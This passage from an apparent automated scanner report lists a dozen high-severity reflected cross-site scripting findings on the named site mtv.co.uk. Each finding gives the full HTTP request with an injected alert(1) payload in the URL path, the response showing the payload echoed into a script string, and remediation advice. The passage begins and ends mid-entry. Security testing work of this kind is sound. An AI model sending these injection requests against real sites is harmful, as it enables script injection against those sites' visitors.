Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:39 GMT
Date: Mon, 12 Sep 2011 12:50:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.
...[SNIP]...

2.92. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c3f"-alert(1)-"6b0f5865cdd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:46 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13464
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:46 GMT
Date: Mon, 12 Sep 2011 12:50:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
orting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttrib
...[SNIP]...

2.93. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb0b9"-alert(1)-"f96d614e794 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13465
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:53 GMT
Date: Mon, 12 Sep 2011 12:50:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.94. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e2a2"-alert(1)-"6efac768962 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files4e2a2"-alert(1)-"6efac768962/favicon.ico HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:48 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:48 GMT
Date: Mon, 12 Sep 2011 12:50:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files4e2a2"-alert(1)-"6efac768962/favicon.ico");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
...[SNIP]...

2.95. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeecc"-alert(1)-"a82a271c334 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/favicon.icoaeecc"-alert(1)-"a82a271c334 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:50:55 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13403
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:50:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:50:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files/favicon.icoaeecc"-alert(1)-"a82a271c334");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.96. http://www.mtv.co.uk/misc/thickbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /misc/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d548"-alert(1)-"85713fad3dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/9d548"-alert(1)-"85713fad3dc?1234890360 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13383
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/misc/9d548"-alert(1)-"85713fad3dc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.97. http://www.mtv.co.uk/modules/node/node.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1113"-alert(1)-"742e68c81f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/node/b1113"-alert(1)-"742e68c81f7?1234890364 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:52 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13395
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:52 GMT
Date: Mon, 12 Sep 2011 12:49:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/node/b1113"-alert(1)-"742e68c81f7");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.98. http://www.mtv.co.uk/modules/system/defaults.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bfa3"-alert(1)-"b3ed22fa9a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/4bfa3"-alert(1)-"b3ed22fa9a2?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:51 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13399
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:51 GMT
Date: Mon, 12 Sep 2011 12:49:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/4bfa3"-alert(1)-"b3ed22fa9a2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.99. http://www.mtv.co.uk/modules/system/system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18ade"-alert(1)-"c57ecfadbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/18ade"-alert(1)-"c57ecfadbe?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/18ade"-alert(1)-"c57ecfadbe");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.100. http://www.mtv.co.uk/modules/user/user.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dce4"-alert(1)-"99564bbadd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/user/9dce4"-alert(1)-"99564bbadd4?1234890366 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13398
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/user/9dce4"-alert(1)-"99564bbadd4");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.101. http://www.mtv.co.uk/sites/all/modules/cck/content.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/cck/content.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c31"-alert(1)-"2f891d8457f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f?1234890340 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13413
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:53 GMT
Date: Mon, 12 Sep 2011 12:49:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.102. http://www.mtv.co.uk/sites/all/modules/fckeditor/fckeditor.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 326da"-alert(1)-"6d091b0c1cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc?1234890357 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:54 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13423
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:55 GMT
Date: Mon, 12 Sep 2011 12:49:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.103. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
